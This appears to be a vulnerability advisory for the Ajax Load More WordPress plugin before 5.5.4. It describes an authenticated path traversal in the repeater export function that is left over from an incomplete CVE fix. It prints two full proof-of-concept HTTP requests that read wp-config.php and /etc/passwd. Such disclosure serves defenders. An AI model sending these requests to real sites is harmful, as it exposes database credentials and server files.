The plugin does not properly validates paths generated with user input in the alm_repeaters_export() function, which could allow high privilege users to read arbitrary files form the server (even when they should not be able to have access to any, for example in multisite setup) This is due to an incomplete fix of CVE-2022-2943
Get arbitrary PHP files, such as wp-config.php POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 95 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 alm_repeaters_export_type=a&alm;_repeaters_export=1&alm;_repeaters_export_name=…/…/…/wp-config Get arbitrary files (requires the alm_templates folder to exist inside the active theme, or a web server not needing intermediary folders to exist, such as IIS) POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 121 Connection: close Cookie: [admin+] alm_repeaters_export_type=theme-repeater&alm;_repeaters_export=1&alm;_repeaters_export_name=…/…/…/…/…/…/…/etc/passwd
CPE | Name | Operator | Version |
---|---|---|---|
ajax-load-more | lt | 5.5.4 |